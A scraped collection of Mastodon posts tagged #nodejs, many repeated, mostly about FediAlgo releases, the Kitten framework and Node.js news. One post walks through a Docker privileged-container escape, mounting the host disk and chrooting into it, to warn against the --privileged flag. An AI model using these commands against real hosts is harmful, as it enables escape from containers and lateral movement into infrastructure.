#Kitten #SmallWeb #SmallTech #web #dev #Markdown #JavaScript #HTML #CSS #JavaScript #NodeJS

The new integrated Markdown parser I’ve been implementing in Kitten has been kicking my ass for the past few weeks but I think I finally have it fully working and seamlessly so. Expect a new release this/next week that brings the parsing of Markdown pages (.page.md files) in your apps up to the standard of the recently-improved runtime Markdown parsing in Kitten HTML tagged-template strings (within `<markdown>…</markdown>` blocks).

The coolest thing is I was able to implement this without introducing any new syntax. In fact, I was able to simplify things so that you can now add arbitrary JavaScript to your Markdown pages within a multi-line script block in the YAML front matter (`script: |`) and use JavaScript string interpolation syntax in your Markdown (and, of course, Kitten components and conditionals, which, themselves, rely on string interpolation).

The only place where you have to deviate from standard Markdown in your Markdown pages is if you have JavaScript string interpolations or Kitten components/conditionals in code fences within your Markdown. In that case, you’ll have to escape them (e.g., `<\${Component} />`, `\<if \${something}>something\</if>`, etc.). And, to be fair, the person most impacted by this is likely me as the Kitten documentation at https://kitten.small-web.org is written in Kitten so I had a lot of escaping to do. But for any other use case, it means that things should just work and work exactly as they do in JavaScript pages (page.js files).

Anyway, so this is going to be a breaking change so I thought I’d give you (the three of you playing with Kitten right now?) a heads up. Of course, I’ll be updating the documentation to reflect all this.

(Remember, Kitten is in pre-release and it’s the framework I’m building/using to create Catalyst – the Small Web hosting solution – and Yarn – a small web – peer to peer – personal site app. So Kitten isn’t the means, not the end. And, at least until the Version 1 API freeze, things can and will break. That said, there’s nothing stopping you from playing with it now and, to be fair, at this point, such breaking changes should become rarer and rarer).

💕

#Kitten #SmallWeb #SmallTech #web #dev #Markdown #JavaScript #HTML #CSS #JavaScript #NodeJS

I'm working on a #poc in plain #nodejs 👀
Not published yet, put maybe I will fight #nestjs as a competitor 🤔

This is already working AND fully written in #es2025 #esm with #tc39 decorator proposal

What do you think?

Ω🪬Ω
Released version 1.0.3 of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed. Incredibly minor bugfix release.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
Released version 1.0.3 of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed. Incredibly minor bugfix release.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

https://habr.com/ru/articles/933702/

#nodejs

#Development #Overviews
JavaScript’s runtime decade · Running JavaScript beyond the browser and Node.js https://ilo.im/165oqw

_____
#JavaScript #Devices #Cloud #Browser #NodeJS #Deno #Bun #WebDev #Frontend #Backend

#Development #Overviews
JavaScript’s runtime decade · Running JavaScript beyond the browser and Node.js https://ilo.im/165oqw

_____
#JavaScript #Devices #Cloud #Browser #NodeJS #Deno #Bun #WebDev #Frontend #Backend

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

Dev0: Hey, this isn't working, I hate containers...
Dev1: Maybe just add the --privileged flag!

ItSec: Just… no. Simply no. No privileged mode - the grumpy fellow interjects as he walks away.

Dev0: Jesus, fine - no privileged mode.
Dev1: Okay, but… why?

Here's why (one, simple example): 

Docker's --privileged flag lifts almost all restrictions from your container - exactly the opposite of --cap-drop=ALL. Let's demo the difference. 

1) Start two containers.

docker run -itd --privileged --name ubuntu-privileged ubuntu
docker run -itd --name ubuntu-unprivileged ubuntu

2) Inspect /dev in the unprivileged container.

docker exec -it ubuntu-unprivileged bash
ls /dev
exit

You'll only see a limited set of devices. No disk access. 

3) Now inspect /dev in the privileged container.

docker exec -it ubuntu-privileged bash
ls /dev

/dev/sda exposed! Sometimes you may see /dev/mapper when LVM is in place. Then "apt update && apt install -y lvm2" and "lvscan" may help during next phase.

4) Exploitation part (inside the privileged container) - simply mount /dev/sda to any writable path in container.

mkdir /tmp/whatever
mount /dev/sda1 /tmp/whatever

5) You can now enumerate - and access - the Docker host's logical volume.

ls -la /tmp/whatever

6) If you wish, you can even chroot into the host:

chroot /tmp/whatever /bin/bash

The moral of the story is to avoid privileged mode, because in the event of an incident (e.g. an attacker compromising an app running inside a container), you significantly increase the likelihood of successful lateral movement from the container to the Docker host - and from there into the rest of your infrastructure.

Usually the grumpy guy means well. He just doesn't know how to explain it properly.

#devops #programming #webdev #java #linux #cybersecurity #php #nodejs

🚨 New research: North Korea’s Contagious Interview campaign is back, with 67 new malicious npm packages, a new malware loader (XORIndex), and 17K+ downloads.

Details, IOCs, and full package list →

https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages #javascript #nodejs #infosec

🚨 New research: North Korea’s Contagious Interview campaign is back, with 67 new malicious npm packages, a new malware loader (XORIndex), and 17K+ downloads.

Details, IOCs, and full package list →

https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages #javascript #nodejs #infosec

Interesting talk on multithreading in #nodeJS by @mcollina at #weAreDevelopers

I might need to give piscina a shot 🤔

Ω🪬Ω
Latest version of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, allows for the use of multiple accounts on multiple Mastodon servers. Also fixes some #GoToSocial interoperability issues.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
Latest version of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, allows for the use of multiple accounts on multiple Mastodon servers. Also fixes some #GoToSocial interoperability issues.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
Latest version of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, allows for the use of multiple accounts on multiple Mastodon servers. Also fixes some #GoToSocial interoperability issues.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

So recently the @nodejs project posted an article seeking LGBTQIA+ stories from people who use or have contributed to Node.js, I shared the link last week.

Anyway, I decided to submit a story of how Node.js and tech in general was a lifeline for me as a teenager, in a world where I didn't quite fit in, and how I came to realise I was trans.

Many thanks to them for providing this opportunity!

https://nodejs.org/en/blog/community/2025-06-28-Emelia-Smith

#nodejs #lgbtqia #PrideMonth

So recently the @nodejs project posted an article seeking LGBTQIA+ stories from people who use or have contributed to Node.js, I shared the link last week.

Anyway, I decided to submit a story of how Node.js and tech in general was a lifeline for me as a teenager, in a world where I didn't quite fit in, and how I came to realise I was trans.

Many thanks to them for providing this opportunity!

https://nodejs.org/en/blog/community/2025-06-28-Emelia-Smith

#nodejs #lgbtqia #PrideMonth

Well, that was a fun error: went to install a node.js project, which depended on sqlite, and it failed because Python 3.13 no longer has distutils in it, and you instead need to do:

pip install --upgrade setuptools

To get the distutils package.

This happened because the Node.js module for sqlite uses node-gyp for building, which depends on distutils.

#nodejs

Well, that was a fun error: went to install a node.js project, which depended on sqlite, and it failed because Python 3.13 no longer has distutils in it, and you instead need to do:

pip install --upgrade setuptools

To get the distutils package.

This happened because the Node.js module for sqlite uses node-gyp for building, which depends on distutils.

#nodejs

Well, that was a fun error: went to install a node.js project, which depended on sqlite, and it failed because Python 3.13 no longer has distutils in it, and you instead need to do:

pip install --upgrade setuptools

To get the distutils package.

This happened because the Node.js module for sqlite uses node-gyp for building, which depends on distutils.

#nodejs

Over the weekend, Node.js quietly added a homepage button linking to paid third-party support for EOL versions.
This controversial move sparked pushback and now the TSC is weighing next steps.

Full story → https://socket.dev/blog/node-js-homepage-adds-paid-support-link-prompting-contributor-pushback #NodeJS

Ω🪬Ω
Latest release of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, lets you blur / hide images marked as sensitive / #NSFW, which solves the "unwanted dick pics in your feed" issue that can come up when users of one of the more "risque" fediverse servers manage to make one of their favourite hashtags trend.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Ω🪬Ω
Latest release of #FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, lets you blur / hide images marked as sensitive / #NSFW, which solves the "unwanted dick pics in your feed" issue that can come up when users of one of the more "risque" fediverse servers manage to make one of their favourite hashtags trend.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #GoToSocial #hashtag #hashtags #MastoAdmin #Mastodon #MastodonApi #mastohelp #mastojs #nodejs #nod #opensource #socialmedia #SocialWeb #timeline #TL #typescript #webdev

Over the weekend, Node.js quietly added a homepage button linking to paid third-party support for EOL versions.
This controversial move sparked pushback and now the TSC is weighing next steps.

Full story → https://socket.dev/blog/node-js-homepage-adds-paid-support-link-prompting-contributor-pushback #NodeJS

Ω🪬Ω
new release of #Fedialgo, the customizable timeline algorithm / filtering system for your Mastodon feed, counts the number of times each hashtag appears in your timeline even if people don't use a "#" character to give you a better sense of what people are talking about in the Fediverse.

there's a little bit of art vs. science here because some strings are disqualified from this kind of counting (e.g. a word like "the" should not be counted even if some maniac decided to make it a hashtag) so let me know if you see any weirdly high counts.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #node #opensource #SocialWeb #timeline #TL #webdev #hashtag #typescript #hashtags

Ω🪬Ω
new release of #Fedialgo, the customizable timeline algorithm / filtering system for your Mastodon feed, counts the number of times each hashtag appears in your timeline even if people don't use a "#" character to give you a better sense of what people are talking about in the Fediverse.

there's a little bit of art vs. science here because some strings are disqualified from this kind of counting (e.g. a word like "the" should not be counted even if some maniac decided to make it a hashtag) so let me know if you see any weirdly high counts.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #node #opensource #SocialWeb #timeline #TL #webdev #hashtag #typescript #hashtags

Ω🪬Ω
new release of #Fedialgo, the customizable timeline algorithm / filtering system for your Mastodon feed, counts the number of times each hashtag appears in your timeline even if people don't use a "#" character to give you a better sense of what people are talking about in the Fediverse.

there's a little bit of art vs. science here because some strings are disqualified from this kind of counting (e.g. a word like "the" should not be counted even if some maniac decided to make it a hashtag) so let me know if you see any weirdly high counts.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #node #opensource #SocialWeb #timeline #TL #webdev #hashtag #typescript #hashtags

Or donc, #JeChercheUnJob

Idéalement, où mes 20+ années d'expérience dans "la tech" au sens large pourraient bénéficier à l'#environnement, l'#éducation, la #santé.

Il y a peu de domaines de la tech qui me font peur. J'ai fait du front, du back, de l'embarqué, du desktop, de l'intégration.

Je connais très bien l'écosystème #Java, un peu moins #Nodejs et #Python - et j'apprends vite.

Je me reconnais à 100% dans cette description des "généralistes experts" : https://martinfowler.com/articles/expert-generalist.html

Ω🪬Ω
Just pushed a new release of #FediAlgo to production. Now sprinkles the latest posts from your homeserver into your feed, caches more stuff for performance reasons, fully supports blocked domains, and some other stuff.

https://universeodon.com/@cryptadamist/114518687892123058

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags #MastodonApi #socialmedia

Ω🪬Ω
Just pushed a new release of #FediAlgo to production. Now sprinkles the latest posts from your homeserver into your feed, caches more stuff for performance reasons, fully supports blocked domains, and some other stuff.

https://universeodon.com/@cryptadamist/114518687892123058

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags #MastodonApi #socialmedia

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, is now deployed on Github Pages and can be used from your web browser.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
Just pushed a new release of #FediAlgo to production. Now sprinkles the latest posts from your homeserver into your feed, caches more stuff for performance reasons, fully supports blocked domains, and some other stuff.

https://universeodon.com/@cryptadamist/114518687892123058

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags #MastodonApi #socialmedia

Ω🪬Ω
Just pushed a new release of #FediAlgo to production. Now sprinkles the latest posts from your homeserver into your feed, caches more stuff for performance reasons, fully supports blocked domains, and some other stuff.

https://universeodon.com/@cryptadamist/114518687892123058

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags #MastodonApi #socialmedia

#FediAlgo will now let you filter your feed by the server your timeline toots are originating from. You can also choose whether to color highlight hashtags you've participated in or favourited and some other fun stuff.

* Try it w/your browser: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags

#FediAlgo will now let you filter your feed by the server your timeline toots are originating from. You can also choose whether to color highlight hashtags you've participated in or favourited and some other fun stuff.

* Try it w/your browser: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #mastojs #hashtags

Stop Losing Sleep Over Node.js Config: Here's How to Get It Right — Unpacking Config & Environment Variables in Node.js

https://blog.platformatic.dev/stop-losing-sleep-over-nodejs-config-heres-how-to-get-it-right

#nodejs

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, now has a "TOTAL CHAOS" preset for when you're really feeling like mixing up your timeline in addition to a way to weight toots based on the author's follower count, highlighting of hashtags based on how much you use or interact with them, and a bunch of other fund stuff.

* Try It: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #chaos #erys

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, now has a "TOTAL CHAOS" preset for when you're really feeling like mixing up your timeline in addition to a way to weight toots based on the author's follower count, highlighting of hashtags based on how much you use or interact with them, and a bunch of other fund stuff.

* Try It: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #chaos #erys

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, now has a "TOTAL CHAOS" preset for when you're really feeling like mixing up your timeline in addition to a way to weight toots based on the author's follower count, highlighting of hashtags based on how much you use or interact with them, and a bunch of other fund stuff.

* Try It: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev #chaos #erys

Ω🪬Ω
The new version of #Fedialgo is much, much faster at loading and reordering the timeline. Also has fancy gradients to show you which hashtags in your feed are the ones trending the most and which ones you post about the most. Also a bunch of other tweaks and improvements.

* Try the demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Video of it in action: https://universeodon.com/@cryptadamist/114518687892123058
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
The new version of #Fedialgo is much, much faster at loading and reordering the timeline. Also has fancy gradients to show you which hashtags in your feed are the ones trending the most and which ones you post about the most. Also a bunch of other tweaks and improvements.

* Try the demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Video of it in action: https://universeodon.com/@cryptadamist/114518687892123058
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
The new version of #Fedialgo is much, much faster at loading and reordering the timeline. Also has fancy gradients to show you which hashtags in your feed are the ones trending the most and which ones you post about the most. Also a bunch of other tweaks and improvements.

* Try the demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Video of it in action: https://universeodon.com/@cryptadamist/114518687892123058
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
The new version of #Fedialgo is much, much faster at loading and reordering the timeline. Also has fancy gradients to show you which hashtags in your feed are the ones trending the most and which ones you post about the most. Also a bunch of other tweaks and improvements.

* Try the demo: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Video of it in action: https://universeodon.com/@cryptadamist/114518687892123058
* Release notes: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed/releases

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
You can now send replies to Toots as well as expand threads directly within the #FediAlgo demo app, no need to click through to the regular Mastodon web interface.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
You can now send replies to Toots as well as expand threads directly within the #FediAlgo demo app, no need to click through to the regular Mastodon web interface.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

I have posted about this before, but wanted to re-iterate how much in love I am with FediAlgo:

I’m currently on paternity leave so have around half an hour per day for social. That is of course far from enough to keep up with a chronological timeline like mine, and previously with Mastodon the FOMO was real.

Now I go to FediAlgo and I feel I got an overview over what’s interesting in that day. It’s also immensely customisable, but the defaults do a decent job for me.

If you haven’t tried it yet, I highly recommend you try it out. You can try it out on my personal playground at https://fedialgo.thms.uk or on the maintainer’s official website at https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/

Thanks @cryptadamist for the work you put into this!

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

I have posted about this before, but wanted to re-iterate how much in love I am with FediAlgo:

I’m currently on paternity leave so have around half an hour per day for social. That is of course far from enough to keep up with a chronological timeline like mine, and previously with Mastodon the FOMO was real.

Now I go to FediAlgo and I feel I got an overview over what’s interesting in that day. It’s also immensely customisable, but the defaults do a decent job for me.

If you haven’t tried it yet, I highly recommend you try it out. You can try it out on my personal playground at https://fedialgo.thms.uk or on the maintainer’s official website at https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/

Thanks @cryptadamist for the work you put into this!

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #MastoAdmin #Mastodon #mastohelp #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, is now deployed on Github Pages and can be used from your web browser.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, is now deployed on Github Pages and can be used from your web browser.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

Ω🪬Ω
#FediAlgo, the customizable timeline algorithm / filtering system for your Mastodon feed, is now deployed on Github Pages and can be used from your web browser.

* Link: https://michelcrypt4d4mus.github.io/fedialgo_demo_app_foryoufeed/
* Code: https://github.com/michelcrypt4d4mus/fedialgo_demo_app_foryoufeed
* Video of FediAlgo in action: https://universeodon.com/@cryptadamist/114395249311910522

#activitypub #algorithm #algorithmicFeed #algorithmicTimeline #Fedi #FediTips #FediTools #Fediverse #Feed #FOSS #Masto #MastoAdmin #Mastodon #mastohelp #MastoJS #nodejs #nod #opensource #SocialWeb #timeline #TL #webdev

The fine @michael has deployed the #FediAlgo demo app to a place where you can test out the customizable algorithm + filtering system for your home timeline with nothing more than a web browser. You can find it here:

https://fedialgo.thms.uk/

Here's a video of the FediAlgo demo in action (there's a few new features since the video): https://universeodon.com/@cryptadamist/114395249311910522

cc: @rolle @paige @LaurensHof

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

The fine @michael has deployed the #FediAlgo demo app to a place where you can test out the customizable algorithm + filtering system for your home timeline with nothing more than a web browser. You can find it here:

https://fedialgo.thms.uk/

Here's a video of the FediAlgo demo in action (there's a few new features since the video): https://universeodon.com/@cryptadamist/114395249311910522

cc: @rolle @paige @LaurensHof

#FediTools #FediTips #Fediverse #Mastodon #activitypub #mastohelp #Fedi #foss #nodejs #opensource #MastoAdmin #SocialWeb #Feed #timeline #algorithmicFeed #algorithmicTimeline #TL #algorithm #node #nodejs

Dependabot opened a PR to update my logging pipeline from Node22 to 24 this morning. This auto-deployed to a pre-prod environment and my stats tell me Node 24 is using ~8% (of 1GiB) more RAM than Node 22, with very similar workload.
My setup is Google Cloud Run running Debian slim.
Anyone seen this? I can't find anything being reported on the web.
#NodeJS #WebDev

